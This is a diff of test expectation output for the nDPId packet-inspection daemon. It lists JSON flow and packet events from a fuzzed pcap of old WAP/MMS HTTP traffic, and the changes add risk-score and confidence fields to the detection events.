-00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13.servlets\/mms","code":0,"content_type":"","user_agent":""}}
+00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13.servlets\/mms","code":0,"content_type":"","user_agent":""}}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1031854495448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1031854495448,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxLZAAEAGF9+sFAMNrBQDBQBQCirJ0hrh5GTKL1AQgywwqwAA"}
 01114{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1031854495554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":541,"pkt_l4_len":507,"ts_msec":1031854495554,"pkt":"AFCLk5N8CAAgsjZ7CABFAAIPxLdAAEAGU\/esFAMNrBQDBQBQCirJ0hrh5GTKL1AYgyw7RQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3htbA0KY29udGVudC1MZW5ndGg6IDM1OA0KRGF0ZTogVGh1LCAxMiBTZXAgMjAwMiAxODoxNDo1NSBHTVQNCg0KPD94bWzfdmVyc2lvbj0iMS4wIj8+DQo8IURPQ1RZUEUgcGFwIFBVQkxJQyAiLS8vV0FQRk\/+VU0vL0RURCBQQVAgMS4wLy9FTiIgImh0dHA6Ly93d3cud2FwZlVyd20ub3JnL0RURC9wYXBfMS4wL2R0ZCI+DVQ8cGFwPg0KPHJlc3VsdG5vdGlmaWNhdGlvbi1yZXNwb25zZSBwdXNoLWlkPSIxODkzMDFfMTAzMTg1NDQ4ODk5N18xMDM4QGdlY2RzMi5tb2JpbGl0eWxhYi5uZXQiIGNvZGU9IjEwMDAiIGRlc2M9Ik93Ij4NCjxhZ2RyZXPPIDNkZHJlc3MtdmFsdWU9IldBUFBVU0g9KzQ5MTcyNjEwMTAwNC9UWVBFclBMTU5AMTcyLjIwLjMuNSI+PC9hZGRyZXNzPg0KPC9yZXN1bHRub3RpZmljYXRpb24tcmVzcCVzAGU+DQo8L3BhcKqqqg=="}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854499919,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -62,7 +62,7 @@
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1031854532142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1031854532142,"pkt":"CAAgsl17AFCLk5N8CABFAAAsHktAAIAGfkasFAMFrBQDDQosAFDk5q2kEAAAAGACIAB85AAAAgQFtGDD"}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1031854532142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1031854532142,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMFAAEAGF9CsFAMNrBQDBQBQCizKXurZ5OatpWASgyxkbgAAAgQFtA=="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1031854532142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1031854532142,"pkt":"CAAgsl17AFCLk5N8CABFAAAoH0tAAIAGfUqsFAMFrBQDDQosAFDk5q2lyl7q2lAQIjjdHwAAAgQFtGDD"}
-00814{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854532142,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189001","code":0,"content_type":"","user_agent":"SonyEricssonT68\/R201A"}}
+00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854532142,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189001","code":0,"content_type":"","user_agent":"SonyEricssonT68\/R201A"}}
 00845{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":64,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":413,"pkt_type":59136,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":413,"pkt_l4_len":0,"ts_msec":1031854532143,"pkt":"CAAgsl17AFCLk5N85wA1AAGPIUtAAIAGeeOsFAMFrBQDDQosAFDk5rNZyl7q2lAYIjgNigAAWXVTdz09IiwiMi1gZ0NURVFFMW8ydmVOM0ZCeW8xLzVnPT0iLCIzLXpJdGdzSXlLQnBCem01c2xPb2RISEE9PSINCkNvb2t6ZTogVXNlci1JZGVudGl0eS1Gb3J3YXJkLXBwcC11c2VybmFtZT02QzZENjM2RDZGNkM2Ng0KQ29va2llOiBVc2VyLUlkZW50aXR5LUZvcgRhcmQtbXNpc2RuPTO0MzkzMTM3MzIzNjMxMzAzMTMwMzAzNA0KQ29va2llOiBVc2VyLQlkZW50aXR5LUF1dGhlbnRpY2F0aW9uPUJlYXJlcg0KQ29va2llOiBJcC1BZGRyZXNzPTE5Mi4xNjguMi4yNg0KQ29va2llOiBCZWFyZXItVHlwZT1VRFBdCldBUC1Db25uZWN0aW9uOiBTdGFjay1UeXBlPUNPDQpDb29raWU6IHd0bHMtc2VjdXJpdHktbGV2ZWw9bm9uZVQKDQo="}
 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":64,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":59136}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -93,18 +93,19 @@
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1031854557802,"pkt":"CAAgsl17AFCLk5N8CABFAAAsNUtAAIAGZ0asFAMFrBQDDQouAFDlQWz1AAAAAGACIADjNgAAAgQFtAAA"}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1031854557802,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMxAAEAGF8WsFAMNrBQDBQBQCi7KxfhE5UFs9mASgyyW7gAAAgQFtA=="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1031854557802,"pkt":"CAAgsl17AFCLk5N8CABFAAAoNktAAIAGZkqsFAMFrBQDDQouAFDlQWz2ysX4RVAQIjgPoAAAAgQFtAAA"}
-00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854557802,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"ts_msec":1031854557802,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}}
+00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854557802,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"ts_msec":1031854557802,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}}
 00362{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":91,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"ts_msec":1031854557899,"pkt":"AFCLk5N8kgAgsl2cCAAlcwAoxM5AAEAGF8esFAMNrBQDBQB+Ci7KxfhF5UF0EVAQgyynkAAA"}
 00179{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":91,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","protocol":2048}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 02414{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":1031854557975,"pkt":"AFCLk5N8CAAgsl17CABFAAXcxM9AAEAGEhKsFAMNrBRIBQBQCi7KxfhF5UF0EVAQg2xUTwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2Zds6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcJVpY2F0aU9uL3ZuZC53YXAubW1zLW1lQnNhZ2UNCkNvbnRlbnQtTGVuZ3RoOiA0MDAzDQpEYXRlOiBEaHUsIDEyI1NlcCAyMDAyIDE4OjEzOjU3IEdNVA0KDQqMhJgxODkzMDEAjZCLMTg5MzAwQGdlY2RzMi5tb2JpbGl0eWxhYi5uZXQAhQQ9gOeoiRmAKzQ5MTcyNjEwMTAwNC9UWVBFPVBMTU4Alys0OTE3MjYxMDEwMDQvVFlQRT1QTE1OAJZSRTogAIqAj4GGgJCAhBuziWFwcGxpY2F0aW9uL3NtaWwAijxBQUHJPgACF5sIFmF1ZGlvL89tcgCFTWVtb18yLmFtcgAjIUFNUgoEAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAEAAAAAAAAIAAAAAAABAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAEYMHXD3zV\/8IgwWAMBAJCE3zKTS6yvWim2AQAaW9MjVBAFq9g49AEG3NPa5xSPjJCwdiuBGBzXCVzANBaejQlAgQt3KzJjOxe+tzME8YEwHMjOLJPC9RhIk1GBGcB9hyMVB+ymov9JgQcc+TIiquQD7ex2a4EwPA8+J0C0fnQHsHIBAJrIB2IKQBtWLyT3gRGCgMIhBG3oPgxOIIEYApux4qh3leJmGFmBAPwbXU1e9R22GaS9AQACnMDejLvmEUFMqwEnXCQ+IVVpDVVYOcgBAMm+YOVuf\/qr8C7EASdBxxFjGX+HDtZYUwEHBnMGjW5n+PI4knwBBsK4SmqTS8eSRtrYAQiJjP5kk8lcwBI1AgEHAoP2II8axveMUxCBBwKU3dDqfCKT69HlgQcGbBpzQqeNOKNF6oEwAEga4ImSmqwxRZQBFAp8rg96cDaFckq\/gRlAdboXdDfSI5Fhs4Eygrc660OMDBW5HaEBBsHdhiinThEsf5noAQbGQJaMx0Ha8dBdkAEbgqMCaJz67tCjYyGBFYKElgduY8Vu4Zy7gQiCozpdU1ad0ULON4ERAcMeDUZFTuMPjUeBCQG2xs90aDTRIjGIgQiCgWIMmeabddj5oQEHBPho51DgcHKVONABDMmMbh6HE7Qii8JIgQxKT03NTDED6MOAHwEACa6M6Mfl1xY4Ih2BG4p2Zgatr88WCLapAQAJndLPeWwjkERZqQEHCkMM4JXinkRKYxyBCMyCApUNjcVUeFBtAQpCgn4gisK1K1VbUYEGQr9sTV75X6826qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
+00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":93,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1031854557802,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3279,"flow_avg_l4_payload_len":468,"midstream":0,"ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562320,"flow_last_seen":1031854562320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1031854562320,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1031854562320,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1031854562320,"pkt":"CAAgsl1rAFCLk5N8CABFAAAsPltAAIAGXkasFAMFrBQDDQovAFDlUj+sAAAAAGACIADqbQAAAgQFtAAA"}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1031854562321,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxNJAAEAGF7+sFAMNrBQDBQBQCi\/K2yc15VI\/rWASgyyVHwAAAgQFtA=="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1031854562321,"pkt":"CAAgsl17AFCLk5N8CABFIAAoP0tAAIAGXUqsFAMFrBQDDQovAFDlUj+tytsnNlAQIjgN0QAAAgQFtAAA"}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"ts_msec":1031854562321,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 02414{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":1031854562321,"pkt":"CAAgsl17ACVzAJN8CABFAAXcQEtAAIAGVpasFAMFrBQDDSVzAFDlUj+tytsnNlAQInStCAAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvES4xDQpIbnN0OiAxNzIuMjAuMy4xMw0KT3B0OiAiaHR0cDovL3d3dy53My5vcmcvMTk5OS8wNi8yNC1DQ1BQZXhjaGFuZ2UiOyBucz01Ng0KQ29sdGVudC1UeXBlOiBhcHBsaWNhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpBY2NlcHQ6INtwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuDQpVc2VyLEFnZW50OiBTb255RXJpY3Nzb25UNjgvUjIwMUENCEFjY2VwdC1DaGFyc2V0OiAqDQo1Ni1Qcm9maWxlLURpZmYtMTogPD94bWwgdmVyc2lvbj0lcwAwIj8+PHpkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YSVzAHMjInhtbG5zOnByZj0iaHR0cDovL3d3VC53YXBmb291bS5vcmcvVUFQbk9GL2NjcHBzY2hlbWEtMTk5OTEwMTQjIj48IS0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IERlZmF1bHQgZGVzY3JpcHRpb34gb2YgcHJvcGVydGllcyAtLT48cmRmOkRlc2NyaXB0aW9uPjxwcmY6Q2NwcEFjY2VwdD48cmRmOkJhZz48cmRmOmxpPmFwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2U8L3JkZjpsaT48L3JkRzpCYWc+PC9wcmY6Q2NwcEFjY2VwdD5XL3JkZjpEZXNjcmlwdGlvbj48L3JkZjpSREY+DQo1Ni1Qcm9maWxlLURpZmYtMjogPD94bWwgdmVyc2lvbj0iMS4wIj8+PHJkZjpSREYgcG18bnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjInhtbLVzOnByZj0iaHR0cDovL3d3dy53YXBmb3J1bS5vcmcvVUFQUk9GL2NjcHBzY2hlbWEtMTk5OTEwMDQjIj48IS0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IERlZmF1bHQgZGVzY3JpcHRpb24gb2YgcHJvcGVydGllcyAtLT58ckhmOkRlc2NyaXB0aW9uPjxwcmY6Q2NwcEFjY2VwdC1DaGFyc2V0PjxyZGY6QmFnPjxyZGY6bGk+KjwvcmRmOmxpPjwvcmRmOkJhZz48L3ByZjpDY3BwQWNjZXB0LUNoYXJzZXQ+PC9yZGY6RGVzY3JpcHRpb24+PC9yZGY6UkRGPg0KNTYtUHJvZmlsZS1EaWZmLTM6IDw\/eG1sIHZlcnNpb249IjEuMCI\/PjxyZGY6UkRGIHhtbG5zOnJkZj1MaHR0cDovL3d3dy53My5vcmcvMTk5OS8wMi8yMi1yZGYtc3ludGF4LW5zIyJ4bWxuczpwcmY9Imh0dHA6L9x3d3cud2FwZm9CdW0ub3JnL1VBUFJPRi9jY3Bwc2NoZW1hLTE5OTkxMDE0IyI+PCEtLSBicm93c2VyIHZlbmRvciBzaXRlOiBEZWZhdWx0IGRlc2NyaXB0aW9uIG9mIHByb3BlcnRpZXMxLS0+PHJkZk5EZXNjcmlwdGlvbj48cHJmOkNjcHBB9mNlcHQtTGFuZ3VhZ2U+PHJkZjpTZXE+PHJkZjpsaT5lbjwvcmRiOmxpPjwvcmRmOlNlcT48L3ByZjpDY3BwQWNjZXB0LUxhbmd1YWdlPjwvcmRmOkRlc2NyaXB0OG9uPjwvcmRmOlJERj4NCjU2LVByb2ZpbGUJICJodHRwOi8vd2FwLnNvbnllcmljc3Nvbm1vYmlsZS5jb20vVUFwcm9mL1Q2OFI="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"ts_msec":1031854562321,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"ts_msec":1031854562321,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
